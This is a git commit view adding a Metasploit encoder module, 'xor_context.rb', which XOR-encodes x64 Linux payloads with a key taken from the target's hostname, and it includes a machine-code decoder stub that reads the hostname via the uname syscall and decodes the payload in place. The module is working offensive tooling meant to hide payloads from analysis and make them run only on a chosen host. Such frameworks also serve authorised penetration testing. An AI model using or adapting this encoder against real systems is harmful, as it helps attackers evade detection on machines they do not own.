Browse Source

Create xor_context.rb

O . S . O 3 months ago
parent
commit
51fe61838d
No account linked to committer's email address
1 changed files with 52 additions and 0 deletions
  1. 52
    0
      modules/encoders/x64/xor_context.rb

+ 52
- 0
modules/encoders/x64/xor_context.rb View File

@@ -0,0 +1,52 @@
1
+##
2
+# This module requires Metasploit: https://metasploit.com/download
3
+# Current source: https://github.com/rapid7/metasploit-framework
4
+##
5
+
6
+class MetasploitModule < Msf::Encoder::Xor
7
+
8
+  def initialize
9
+    super(
10
+      'Name'             => 'Hostname-based Context Keyed Payload Encoder',
11
+      'Description'      => 'Context-Keyed Payload Encoder based on hostname and x64 XOR encoder.',
12
+      'Author'           => [ 'sf' 'oso' ],
13
+      'Arch'             => ARCH_X64,
14
+      'License'          => MSF_LICENSE,
15
+      'Platform'         => 'linux',
16
+      'Decoder'          =>
17
+        {
18
+          'KeySize'      => 8,
19
+          'KeyPack'      => 'Q',
20
+          'BlockSize'    => 8,
21
+        }
22
+      )
23
+
24
+    register_options([ OptString.new('C_HOSTNAME',[ true, "Context Hostname.", "hostname"])])
25
+  end
26
+
27
+  def obtain_key(buf, badchars, state)
28
+    # TODO: Currently only first 8 chars are taken as key. We should include the other chars in the key.
29
+    state.key = datastore['C_HOSTNAME'][0..8].reverse!.unpack('H*')[0].to_i(base=16)
30
+  end
31
+
32
+  def decoder_stub( state )
33
+    # calculate the (negative) block count . We should check this against state.badchars.
34
+    block_count = [-( ( (state.buf.length - 1) / state.decoder_key_size) + 1)].pack( "V" )
35
+
36
+    decoder = ""+
37
+      # get hostname
38
+      "\x6a\x3f\x58" +                  # push 0x3f; pop rax
39
+      "\x48\x8D\x3C\x24" +              # lea rdi, [rsp]
40
+      "\x0F\x05" +                      # syscall ; LINUX - sys_uname
41
+      "\x48\x8B\x5F\x41" +              # movq rbx, [rdi+0x41]; hostname
42
+
43
+      # loop
44
+      "\x48\x31\xC9" +                  # xor rcx, rcx
45
+      "\x48\x81\xE9" + block_count +    # sub ecx, block_count
46
+      "\x48\x8D\x05\xEF\xFF\xFF\xFF" +  # lea rax, [rip - 0x01]
47
+      "\x48\x31\x58\x1d" +              # xor [rax+0x1d], rbx
48
+      "\x48\x2D\xF8\xFF\xFF\xFF" +      # sub rax, -8
49
+      "\xE2\xF4"                        # loop 0x1B
50
+    return decoder
51
+  end
52
+end

Loading…
Cancel
Save